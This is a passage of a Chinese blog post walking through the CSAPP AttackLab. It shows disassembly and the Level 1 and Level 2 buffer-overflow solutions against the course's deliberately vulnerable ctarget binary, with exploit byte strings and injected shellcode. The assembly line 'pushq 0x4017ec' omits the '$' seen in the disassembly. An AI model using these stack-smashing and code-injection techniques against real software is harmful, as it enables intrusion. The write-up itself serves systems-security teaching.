<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"yiweiboi.github.io","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="注意事项 开始实验前强烈建议读一下官方的说明文档：attacklab.pdf (cmu.edu)  ctarget：易受到代码注入攻击的可执行程序  rtarget：易受到面向返回编程攻击的可执行程序  cookie.txt：一个 8 位十六进制代码，您将在攻击中用作唯一标识符  fram.c：目标的 “小工具农场” 的源代码，您将使用它来生成面向返回的编程攻击  hex2raw：用于生成攻击字符">
<meta property="og:type" content="article">
<meta property="og:title" content="CSAPP AttackLab">
<meta property="og:url" content="http://yiweiboi.github.io/2024/03/11/CSAPP-Lab3/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="注意事项 开始实验前强烈建议读一下官方的说明文档：attacklab.pdf (cmu.edu)  ctarget：易受到代码注入攻击的可执行程序  rtarget：易受到面向返回编程攻击的可执行程序  cookie.txt：一个 8 位十六进制代码，您将在攻击中用作唯一标识符  fram.c：目标的 “小工具农场” 的源代码，您将使用它来生成面向返回的编程攻击  hex2raw：用于生成攻击字符">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://yiweiboi.github.io/2024/03/11/CSAPP-Lab3/image-20240314104441467.png">
<meta property="og:image" content="http://yiweiboi.github.io/2024/03/11/CSAPP-Lab3/image-20240311201249891.png">
<meta property="og:image" content="http://yiweiboi.github.io/2024/03/11/CSAPP-Lab3/image-20240312161155532.png">
<meta property="og:image" content="http://yiweiboi.github.io/2024/03/11/CSAPP-Lab3/image-20240312162217620.png">
<meta property="og:image" content="http://yiweiboi.github.io/2024/03/11/CSAPP-Lab3/image-20240313115138026.png">
<meta property="og:image" content="http://yiweiboi.github.io/2024/03/11/CSAPP-Lab3/image-20240313120319386.png">
<meta property="og:image" content="http://yiweiboi.github.io/2024/03/11/CSAPP-Lab3/image-20240313153659095.png">
<meta property="og:image" content="http://yiweiboi.github.io/2024/03/11/CSAPP-Lab3/image-20240313154452626.png">
<meta property="og:image" content="http://yiweiboi.github.io/2024/03/11/CSAPP-Lab3/image-20240314103504643.png">
<meta property="og:image" content="http://yiweiboi.github.io/2024/03/11/CSAPP-Lab3/image-20240315092444544.png">
<meta property="article:published_time" content="2024-03-11T02:29:55.000Z">
<meta property="article:modified_time" content="2024-03-27T06:33:57.914Z">
<meta property="article:author" content="yiweiBoi">
<meta property="article:tag" content="CSAPP">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://yiweiboi.github.io/2024/03/11/CSAPP-Lab3/image-20240314104441467.png">

<link rel="canonical" href="http://yiweiboi.github.io/2024/03/11/CSAPP-Lab3/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>CSAPP AttackLab | Hexo</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Hexo</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://yiweiboi.github.io/2024/03/11/CSAPP-Lab3/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="yiweiBoi">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Hexo">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          CSAPP AttackLab
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2024-03-11 10:29:55" itemprop="dateCreated datePublished" datetime="2024-03-11T10:29:55+08:00">2024-03-11</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2024-03-27 14:33:57" itemprop="dateModified" datetime="2024-03-27T14:33:57+08:00">2024-03-27</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="注意事项"><a href="#注意事项" class="headerlink" title="注意事项"></a>注意事项</h1><ul>
<li><p>开始实验前强烈建议读一下官方的说明文档：<a target="_blank" rel="noopener" href="http://csapp.cs.cmu.edu/3e/attacklab.pdf">attacklab.pdf (cmu.edu)</a></p>
</li>
<li><p><strong>ctarget</strong>：易受到代码注入攻击的可执行程序</p>
</li>
<li><p><strong>rtarget</strong>：易受到面向返回编程攻击的可执行程序</p>
</li>
<li><p><strong>cookie.txt</strong>：一个 8 位十六进制代码，您将在攻击中用作唯一标识符</p>
</li>
<li><p><strong>fram.c</strong>：目标的 “小工具农场” 的源代码，您将使用它来生成面向返回的编程攻击</p>
</li>
<li><p><strong>hex2raw</strong>：用于生成攻击字符串的实用程序</p>
</li>
<li><p>CTARGET 和 RTARGET 都从标准输入读取字符串。他们使用下面定义的函数 getbuf 来执行此操作：</p>
</li>
</ul>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">1</span> <span class="type">unsigned</span> <span class="title function_">getbuf</span><span class="params">()</span></span><br><span class="line">2 &#123;</span><br><span class="line"><span class="number">3</span> 		<span class="type">char</span> buf[BUFFER_SIZE];</span><br><span class="line"><span class="number">4</span> 		Gets(buf);</span><br><span class="line"><span class="number">5</span> 		<span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line"><span class="number">6</span> &#125;</span><br></pre></td></tr></table></figure>

<blockquote>
<p>函数 Gets 类似于标准库函数 gets，它从标准输入读取字符串，并将其存储在指定的目标位置</p>
<p>函数 Gets 和 gets 都无法确定其目标缓冲区是否足够大来存储它们读取的字符串。它们只是复制字节序列，可能会超出目标分配的存储边界</p>
</blockquote>
<ul>
<li>前三个实验涉及对 CTARGET 的代码注入（CI）攻击，而后两个涉及对 RTARGET 的面向返回编程（ROP）攻击</li>
</ul>
<img src="/2024/03/11/CSAPP-Lab3/image-20240314104441467.png" class="" title="image-20240314104441467">

<h1 id="Code-Injection-Attacks"><a href="#Code-Injection-Attacks" class="headerlink" title="Code Injection Attacks"></a>Code Injection Attacks</h1><ul>
<li>在前三个阶段，您的漏洞利用字符串将攻击 CTARGET</li>
<li>该程序的设置方式是，堆栈位置在一次运行到下一次运行之间保持一致，因此堆栈上的数据可以被视为可执行代码</li>
<li>这些功能使程序容易受到攻击，其中漏洞利用字符串包含可执行代码的字节编码</li>
</ul>
<h1 id="Level-1"><a href="#Level-1" class="headerlink" title="Level 1"></a>Level 1</h1><ul>
<li><p>对于第 1 阶段，您将不会注入新代码，相反，您的攻击字符串将重定向程序以执行现有过程</p>
</li>
<li><p>函数 getbuf 由具有以下 C 代码的函数测试在 CTARGET 中调用</p>
</li>
</ul>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">1</span> <span class="type">void</span> <span class="title function_">test</span><span class="params">()</span></span><br><span class="line">2 &#123;</span><br><span class="line"><span class="number">3</span> 		<span class="type">int</span> val;</span><br><span class="line"><span class="number">4</span> 		val = getbuf();</span><br><span class="line"><span class="number">5</span> 		<span class="built_in">printf</span>(<span class="string">&quot;No exploit. Getbuf returned 0x%x\n&quot;</span>, val);</span><br><span class="line"><span class="number">6</span> &#125;</span><br></pre></td></tr></table></figure>

<ul>
<li>getbuf 执行 return 语句时，程序通常会在 test 的第 5 行恢复执行</li>
<li>我们想改变这种行为，在文件 ctarget 中，有一个函数 touch1 的代码，具有以下 C 表示形式</li>
</ul>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">1</span> <span class="type">void</span> <span class="title function_">touch1</span><span class="params">()</span></span><br><span class="line">2 &#123;</span><br><span class="line"><span class="number">3</span> 		vlevel = <span class="number">1</span>; <span class="comment">/* Part of validation protocol */</span></span><br><span class="line"><span class="number">4</span> 		<span class="built_in">printf</span>(<span class="string">&quot;Touch1!: You called touch1()\n&quot;</span>);</span><br><span class="line"><span class="number">5</span> 		validate(<span class="number">1</span>);</span><br><span class="line"><span class="number">6</span> 		<span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line"><span class="number">7</span> &#125;</span><br></pre></td></tr></table></figure>

<ul>
<li><p>您的任务是让 CTARGET 在 getbuf 执行其 return 语句时执行 touch1 的代码，而不是返回测试</p>
</li>
<li><p>说明文档的一些建议</p>
<ul>
<li>通过命令 <strong>objdump -d .&#x2F;ctarget &gt;&gt; ctarget.s</strong> 得到反汇编的 CTARGET 版本</li>
<li>定位 touch1 起始地址的字节表示，以便 getbuf 代码末尾的 ret 指令将控制权转移到 touch1</li>
<li>注意字节排序</li>
</ul>
</li>
<li><p>分析 test 的汇编代码</p>
</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">0000000000401968 &lt;test&gt;:</span><br><span class="line">  401968:	48 83 ec 08          	sub    $0x8,%rsp					# %rsp -= 0x8</span><br><span class="line">  40196c:	b8 00 00 00 00       	mov    $0x0,%eax					# %eax = 0x0</span><br><span class="line">  401971:	e8 32 fe ff ff       	callq  4017a8 &lt;getbuf&gt;				# 调用 getbuf</span><br><span class="line">  401976:	89 c2                	mov    %eax,%edx					# %edx = %eax</span><br><span class="line">  401978:	be 88 31 40 00       	mov    $0x403188,%esi				# %esi = 0x403188</span><br><span class="line">  40197d:	bf 01 00 00 00       	mov    $0x1,%edi					# %edi = 0x1</span><br><span class="line">  401982:	b8 00 00 00 00       	mov    $0x0,%eax					# %eax = 0x0</span><br><span class="line">  401987:	e8 64 f4 ff ff       	callq  400df0 &lt;__printf_chk@plt&gt;	# 调用 print_chk</span><br><span class="line">  40198c:	48 83 c4 08          	add    $0x8,%rsp					# %rsp += 0x8</span><br><span class="line">  401990:	c3                   	retq   								# return</span><br></pre></td></tr></table></figure>

<ul>
<li><p>test 调用 getbuf 后，如果成功返回到 test，调用 print_chk 打印字符串：**”No exploit.  Getbuf returned 0x%x\n”** </p>
</li>
<li><p>getbuf 执行 return 时将会返回到地址 <strong>0x401976</strong></p>
</li>
<li><p>分析 getbuf 的汇编代码</p>
</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">00000000004017a8 &lt;getbuf&gt;:</span><br><span class="line">  4017a8:	48 83 ec 28          	sub    $0x28,%rsp		# %rsp -= 0x28</span><br><span class="line">  4017ac:	48 89 e7             	mov    %rsp,%rdi		# %rdi = %rsp</span><br><span class="line">  4017af:	e8 8c 02 00 00       	callq  401a40 &lt;Gets&gt;	# 调用 Gets</span><br><span class="line">  4017b4:	b8 01 00 00 00       	mov    $0x1,%eax		# %eax = 0x1</span><br><span class="line">  4017b9:	48 83 c4 28          	add    $0x28,%rsp		# %rsp += 0x28</span><br><span class="line">  4017bd:	c3                   	retq   					# return</span><br></pre></td></tr></table></figure>

<ul>
<li><p>getbuf 的栈帧分配 <strong>0x28（40）</strong> 个字节的空间，调用 Gets 读取字符串从 %rsp 开始向上写入</p>
</li>
<li><p>思路分析</p>
<ul>
<li>输入超过 40 个字节的字符串，从而造成栈溢出，修改返回地址为 touch1 的起始地址</li>
</ul>
</li>
<li><p>分析 touch1 的汇编代码</p>
</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">00000000004017c0 &lt;touch1&gt;:</span><br><span class="line">  4017c0:	48 83 ec 08          	sub    $0x8,%rsp				# %rsp -= 0x8</span><br><span class="line">  4017c4:	c7 05 0e 2d 20 00 01 	movl   $0x1,0x202d0e(%rip)        # 6044dc &lt;vlevel&gt;</span><br><span class="line">  4017cb:	00 00 00 </span><br><span class="line">  4017ce:	bf c5 30 40 00       	mov    $0x4030c5,%edi			# %edi = 0x4030c5</span><br><span class="line">  4017d3:	e8 e8 f4 ff ff       	callq  400cc0 &lt;puts@plt&gt;		# 调用 puts</span><br><span class="line">  4017d8:	bf 01 00 00 00       	mov    $0x1,%edi				# %edi = 0x1</span><br><span class="line">  4017dd:	e8 ab 04 00 00       	callq  401c8d &lt;validate&gt;		# 调用 validate</span><br><span class="line">  4017e2:	bf 00 00 00 00       	mov    $0x0,%edi				# %edi = 0x0</span><br><span class="line">  4017e7:	e8 54 f6 ff ff       	callq  400e40 &lt;exit@plt&gt;		# 调用 exit</span><br></pre></td></tr></table></figure>

<ul>
<li>touch1 的起始地址为 <strong>0x4017c0</strong>，通过 puts 打印字符串：**”Touch1!: You called touch1()”**</li>
</ul>
<h2 id="Solution"><a href="#Solution" class="headerlink" title="Solution"></a>Solution</h2><ul>
<li><p>getbuf 的缓冲区大小为 40 字节，前 40 个字节可以随便输入， 后边的值为 touch1 的起始地址 0x4017c0</p>
</li>
<li><p>我们通过说明文档推荐的方式解决：创建一个 Level1.txt 文件，写入我们想要输入的值的字节级表示</p>
<blockquote>
<p>每个字节的值（两位 16 进制）中间用空格隔开</p>
<p>注意书写顺序，x86 采用小端法</p>
<p>Ubuntu 系统下通过命令 touch Level1.txt 创建文件</p>
</blockquote>
</li>
</ul>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> </span><br><span class="line"><span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> </span><br><span class="line"><span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span></span><br><span class="line"><span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span></span><br><span class="line"><span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span></span><br><span class="line">c0 <span class="number">17</span> <span class="number">40</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span>	<span class="comment">// touch1 起始地址</span></span><br></pre></td></tr></table></figure>

<ul>
<li>通过命令 <strong>.&#x2F;hex2raw &lt; Level1.txt | .&#x2F;ctarget -q</strong> 完成注入<ul>
<li><strong>hex2raw</strong> 是用于生成攻击字符串的实用程序，将 16 进制的字节级表示转换为攻击字符串</li>
<li><strong>|</strong> 表示管道，将转换后的攻击字符串作为 ctarget 的参数</li>
<li><strong>-q</strong> 表示取消连接 CMU 的服务器，连接是默认的，一般我们连接不上 ……</li>
</ul>
</li>
</ul>
<h2 id="Result"><a href="#Result" class="headerlink" title="Result"></a>Result</h2><ul>
<li><strong>运行结果</strong></li>
</ul>
<img src="/2024/03/11/CSAPP-Lab3/image-20240311201249891.png" class="" title="image-20240311201249891">

<h1 id="Level-2"><a href="#Level-2" class="headerlink" title="Level 2"></a>Level 2</h1><ul>
<li><p>第 2 阶段涉及注入少量代码作为漏洞利用字符串的一部分</p>
</li>
<li><p>在文件 ctarget 中，有一个函数 touch2 的代码，具有以下 C 表示形式</p>
</li>
</ul>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">1</span> <span class="type">void</span> <span class="title function_">touch2</span><span class="params">(<span class="type">unsigned</span> val)</span></span><br><span class="line">6</span><br><span class="line">2 &#123;</span><br><span class="line"><span class="number">3</span> 		vlevel = <span class="number">2</span>; <span class="comment">/* Part of validation protocol */</span></span><br><span class="line"><span class="number">4</span> 		<span class="keyword">if</span> (val == cookie) &#123;</span><br><span class="line"><span class="number">5</span> 			<span class="built_in">printf</span>(<span class="string">&quot;Touch2!: You called touch2(0x%.8x)\n&quot;</span>, val);</span><br><span class="line"><span class="number">6</span> 			validate(<span class="number">2</span>);</span><br><span class="line"><span class="number">7</span> 		&#125; <span class="keyword">else</span> &#123;</span><br><span class="line"><span class="number">8</span> 			<span class="built_in">printf</span>(<span class="string">&quot;Misfire: You called touch2(0x%.8x)\n&quot;</span>, val);</span><br><span class="line"><span class="number">9</span> 			fail(<span class="number">2</span>);</span><br><span class="line"><span class="number">10</span> 		&#125;</span><br><span class="line"><span class="number">11</span> 			<span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line"><span class="number">12</span> &#125;</span><br></pre></td></tr></table></figure>

<ul>
<li><p>您的任务是让 CTARGET 执行 touch2 的代码，而不是返回测试</p>
</li>
<li><p>但是，在这种情况下，您必须使其看起来像 touch2，就好像您已将 cookie 作为其参数传递一样</p>
<blockquote>
<p>将 cookie 的值作为 touch2 的参数传递</p>
</blockquote>
</li>
<li><p>说明文档的一些建议</p>
<ul>
<li>您需要定位注入代码地址的字节表示，以便 getbuf 代码末尾的 ret 指令将控制权转移给它</li>
<li>回想一下，函数的第一个参数是在寄存器 %rdi 中传递的</li>
<li>您注入的代码应将寄存器设置为您的 cookie，然后使用 ret 指令将控制权转移到 touch2 中的第一条指令</li>
<li>请勿尝试在漏洞利用代码中使用 <strong>jmp 或 call</strong> 指令，这些指令的目标地址的编码很难制定</li>
<li>请参阅附录 B 中关于如何使用工具生成指令序列的字节级表示的讨论</li>
</ul>
</li>
<li><p>分析 touch2 的汇编代码</p>
</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">00000000004017ec &lt;touch2&gt;:</span><br><span class="line">  4017ec:	48 83 ec 08          	sub    $0x8,%rsp					# %rsp -= 0x8</span><br><span class="line">  4017f0:	89 fa                	mov    %edi,%edx					# %edx = %edi</span><br><span class="line">  4017f2:	c7 05 e0 2c 20 00 02 	movl   $0x2,0x202ce0(%rip)        # 6044dc &lt;vlevel&gt;</span><br><span class="line">  4017f9:	00 00 00 </span><br><span class="line">  4017fc:	3b 3d e2 2c 20 00    	cmp    0x202ce2(%rip),%edi        # 6044e4 &lt;cookie&gt;</span><br><span class="line">  401802:	75 20                	jne    401824 &lt;touch2+0x38&gt;			# if %edi != cookie，跳转到 401824</span><br><span class="line">  401804:	be e8 30 40 00       	mov    $0x4030e8,%esi				# %esi = 0x4030e8</span><br><span class="line">  401809:	bf 01 00 00 00       	mov    $0x1,%edi					# %edi = 0x1</span><br><span class="line">  40180e:	b8 00 00 00 00       	mov    $0x0,%eax					# %eax = 0x0</span><br><span class="line">  401813:	e8 d8 f5 ff ff       	callq  400df0 &lt;__printf_chk@plt&gt;	# 打印 &quot;Touch2!: You called touch2(0x%.8x)\n&quot;</span><br><span class="line">  401818:	bf 02 00 00 00       	mov    $0x2,%edi					# %edi = 0x2</span><br><span class="line">  40181d:	e8 6b 04 00 00       	callq  401c8d &lt;validate&gt;			# 调用 validate</span><br><span class="line">  401822:	eb 1e                	jmp    401842 &lt;touch2+0x56&gt;			# 直接跳转到 401842</span><br><span class="line">  401824:	be 10 31 40 00       	mov    $0x403110,%esi				# %esi = 0x403110</span><br><span class="line">  401829:	bf 01 00 00 00       	mov    $0x1,%edi					# %edi= 0x1</span><br><span class="line">  40182e:	b8 00 00 00 00       	mov    $0x0,%eax					# %eax = 0x0</span><br><span class="line">  401833:	e8 b8 f5 ff ff       	callq  400df0 &lt;__printf_chk@plt&gt;	# 打印 &quot;Misfire: You called touch2(0x%.8x)\n&quot;</span><br><span class="line">  401838:	bf 02 00 00 00       	mov    $0x2,%edi					# %edi = 0x2</span><br><span class="line">  40183d:	e8 0d 05 00 00       	callq  401d4f &lt;fail&gt;				# 调用 fail</span><br><span class="line">  401842:	bf 00 00 00 00       	mov    $0x0,%edi					# %edi = 0x0</span><br><span class="line">  401847:	e8 f4 f5 ff ff       	callq  400e40 &lt;exit@plt&gt;			# 调用 exit</span><br></pre></td></tr></table></figure>

<ul>
<li><p>touch2 将传递的参数和 cookie 进行对比，如果传入的参数值等于 cookie，输出 **”Touch2!: You called touch2(0x%.8x)\n”**，否则输出 <strong>“Misfire: You called touch2(0x%.8x)\n”</strong> </p>
</li>
<li><p>思考</p>
<ul>
<li>任务变得复杂了，仅仅通过栈溢出修改返回地址为 touch2 的起始地址是不行的，还需要将 cookie 作为 touch2 的参数</li>
<li>可以通过注入代码来实现，在注入代码前，我们要明白怎么才能让程序执行我们注入的代码</li>
<li>getbuf 执行 return 时会从相邻的上一个栈帧中取出返回地址并执行</li>
<li>我们可以把指令的字节级表示存储在一个地方，通过栈溢出的方式修改 return 语句的返回地址为存储注入代码的地址，return 执行时就会执行我们注入的代码了</li>
</ul>
</li>
<li><p>思路分析</p>
<ul>
<li><p>通过 getbuf 将注入的代码存储在 getbuf 的栈帧中，也就是说此时存储注入代码的地址就是 getbuf 的 %rsp</p>
</li>
<li><p>通过栈溢出的方式修改 getbuf 执行return 时的返回地址为 getbuf 的 %rsp</p>
</li>
<li><p>注入代码的内容</p>
<ul>
<li><p>通过 movq 将 cooike 的值存储在 %rdi 中作为 touch2 的参数，跳转到 touch2 的起始地址</p>
</li>
<li><p>对于跳转，通过 pushq 将 touch2 的起始地址入栈，通过 ret 从栈中取出 touch2 的起始地址并执行，即通过 pushq + ret 实现跳转</p>
<blockquote>
<p>说明文档提醒我们不要使用 jmp 或 call 等跳转指令</p>
</blockquote>
</li>
</ul>
</li>
</ul>
</li>
<li><p>我们需要找到 getbuf 栈帧的起始地址 %rsp 的值，通过 gdb 调试工具在 getbuf 的 0x4017ac 处设置断点，查看 %rsp 为 <strong>0x5561dc78</strong></p>
</li>
</ul>
<img src="/2024/03/11/CSAPP-Lab3/image-20240312161155532.png" class="" title="image-20240312161155532">

<h2 id="Solution-1"><a href="#Solution-1" class="headerlink" title="Solution"></a>Solution</h2><ul>
<li><p>打开 cookie.txt 文件查看 cookie 的值为 <strong>0x59b997fa</strong></p>
</li>
<li><p>创建一个 Level2.s 文件，写入需要注入代码的汇编形式</p>
</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">movq $0x59b997fa,%rdi	</span><br><span class="line">pushq 0x4017ec</span><br><span class="line">ret</span><br></pre></td></tr></table></figure>

<ul>
<li>通过命令 <strong>gcc -c Level2.s</strong> 生成二进制文件 Level2.o </li>
<li>通过命令 <strong>objdump -d Level2.o &gt; Level2.d</strong> 生成文件 Level2.d，即通过反汇编工具生成汇编代码对应的字节级表示</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">Level2.o：     文件格式 elf64-x86-64</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Disassembly of section .text:</span><br><span class="line"></span><br><span class="line">0000000000000000 &lt;.text&gt;:</span><br><span class="line">   0:	48 c7 c7 fa 97 b9 59 	mov    $0x59b997fa,%rdi</span><br><span class="line">   7:	68 ec 17 40 00       	pushq  $0x4017ec</span><br><span class="line">   c:	c3                   	retq   </span><br></pre></td></tr></table></figure>

<ul>
<li>创建 Level2.txt 文件，写入输入值的字节级表示</li>
</ul>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">48</span> c7 c7 fa <span class="number">97</span> b9 <span class="number">59</span> <span class="number">68</span>	<span class="comment">// 指令的字节级表示</span></span><br><span class="line">ec <span class="number">17</span> <span class="number">40</span> <span class="number">00</span> c3 <span class="number">00</span> <span class="number">00</span> <span class="number">00</span></span><br><span class="line"><span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span></span><br><span class="line"><span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span></span><br><span class="line"><span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span> <span class="number">00</span></span><br><span class="line"><span class="number">78</span> dc <span class="number">61</span> <span class="number">55</span> <span class="number">00</span> <span 